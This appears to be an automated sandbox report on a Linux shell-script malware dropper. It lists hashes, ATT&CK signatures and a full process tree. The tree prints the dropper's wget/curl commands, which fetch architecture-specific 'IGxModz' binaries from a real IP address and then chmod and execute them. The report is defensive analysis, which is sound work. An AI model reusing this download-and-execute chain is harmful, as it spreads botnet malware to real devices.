Analysis
-
max time kernel
8s -
max time network
9s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21/11/2024, 08:50
Static task
static1
Behavioral task
behavioral1
Sample
f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
-
Size
1KB
-
MD5
0b5a60057fc9d9ce95ba5cdaab501e68
-
SHA1
879040e7114865f81dbd3f2fb41409e0cb3b8966
-
SHA256
f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1
-
SHA512
d97b13f656458456b934ab1cdc205ec4efedebfa8ee98675ba38865e916563487d1fd5c649afad7376f469a60ecd16b7c502c549ac095d8be234f6d9e876f351
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 727 chmod 768 chmod 681 chmod 687 chmod 692 chmod 703 chmod 670 chmod 715 chmod 740 chmod 756 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/3AvA 672 3AvA /tmp/3AvA 683 3AvA /tmp/3AvA 688 3AvA /tmp/3AvA 693 3AvA /tmp/3AvA 705 3AvA /tmp/3AvA 717 3AvA /tmp/3AvA 729 3AvA /tmp/3AvA 741 3AvA /tmp/3AvA 758 3AvA /tmp/3AvA 769 3AvA -
Checks CPU configuration 1 TTPs 10 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 673 wget 677 curl 680 cat 683 3AvA -
Writes file to tmp directory 11 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh File opened for modification /tmp/IGxModz.mpsl curl File opened for modification /tmp/IGxModz.arm4 curl File opened for modification /tmp/IGxModz.arm7 curl File opened for modification /tmp/IGxModz.ppc curl File opened for modification /tmp/IGxModz.sh4 curl File opened for modification /tmp/IGxModz.x86 curl File opened for modification /tmp/IGxModz.mips curl File opened for modification /tmp/IGxModz.arm5 curl File opened for modification /tmp/IGxModz.arm6 curl File opened for modification /tmp/IGxModz.m68k curl
Processes
-
/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh1⤵
- Writes file to tmp directory
PID:647 -
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.x862⤵PID:649
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:659
-
-
/bin/catcat IGxModz.x862⤵PID:669
-
-
/bin/chmodchmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE2⤵
- File and Directory Permissions Modification
PID:670
-
-
/tmp/3AvA./3AvA x862⤵
- Executes dropped EXE
PID:672
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.mips2⤵
- System Network Configuration Discovery
PID:673
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:677
-
-
/bin/catcat IGxModz.mips2⤵
- System Network Configuration Discovery
PID:680
-
-
/bin/chmodchmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE2⤵
- File and Directory Permissions Modification
PID:681
-
-
/tmp/3AvA./3AvA mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:683
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.mpsl2⤵PID:684
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:685
-
-
/bin/catcat IGxModz.mpsl2⤵PID:686
-
-
/bin/chmodchmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE2⤵
- File and Directory Permissions Modification
PID:687
-
-
/tmp/3AvA./3AvA mpsl2⤵
- Executes dropped EXE
PID:688
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.arm42⤵PID:689
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.arm42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:690
-
-
/bin/catcat IGxModz.arm42⤵PID:691
-
-
/bin/chmodchmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE2⤵
- File and Directory Permissions Modification
PID:692
-
-
/tmp/3AvA./3AvA arm42⤵
- Executes dropped EXE
PID:693
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.arm52⤵PID:694
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:698
-
-
/bin/catcat IGxModz.arm52⤵PID:702
-
-
/bin/chmodchmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE2⤵
- File and Directory Permissions Modification
PID:703
-
-
/tmp/3AvA./3AvA arm52⤵
- Executes dropped EXE
PID:705
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.arm62⤵PID:706
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:710
-
-
/bin/catcat IGxModz.arm62⤵PID:714
-
-
/bin/chmodchmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE2⤵
- File and Directory Permissions Modification
PID:715
-
-
/tmp/3AvA./3AvA arm62⤵
- Executes dropped EXE
PID:717
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.arm72⤵PID:718
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:721
-
-
/bin/catcat IGxModz.arm72⤵PID:726
-
-
/bin/chmodchmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE2⤵
- File and Directory Permissions Modification
PID:727
-
-
/tmp/3AvA./3AvA arm72⤵
- Executes dropped EXE
PID:729
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.ppc2⤵PID:730
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:733
-
-
/bin/catcat IGxModz.ppc2⤵PID:738
-
-
/bin/chmodchmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/3AvA./3AvA ppc2⤵
- Executes dropped EXE
PID:741
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.m68k2⤵PID:742
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/catcat IGxModz.m68k2⤵PID:754
-
-
/bin/chmodchmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE2⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/3AvA./3AvA m68k2⤵
- Executes dropped EXE
PID:758
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.sh42⤵PID:759
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:762
-
-
/bin/catcat IGxModz.sh42⤵PID:767
-
-
/bin/chmodchmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.sh4 IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE2⤵
- File and Directory Permissions Modification
PID:768
-
-
/tmp/3AvA./3AvA sh42⤵
- Executes dropped EXE
PID:769
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
276B
MD5960b4fa9d5383373f0a1ea04929df01b
SHA1f78054d817db7742162a706b5d9f1fedcdf21140
SHA2563e3036a7715bae7bda5c0b2de74731a835b869ded4d470cddb7f6521114aca7a
SHA5122d5c6ad2bb0f8a8b971d759e3618e8636034cee5b76c362c2107b7fadc38bcaabbaa79cd19f5f2e949005e3d128b1a4efff187d1a3f035791dcbd1255b7ed73f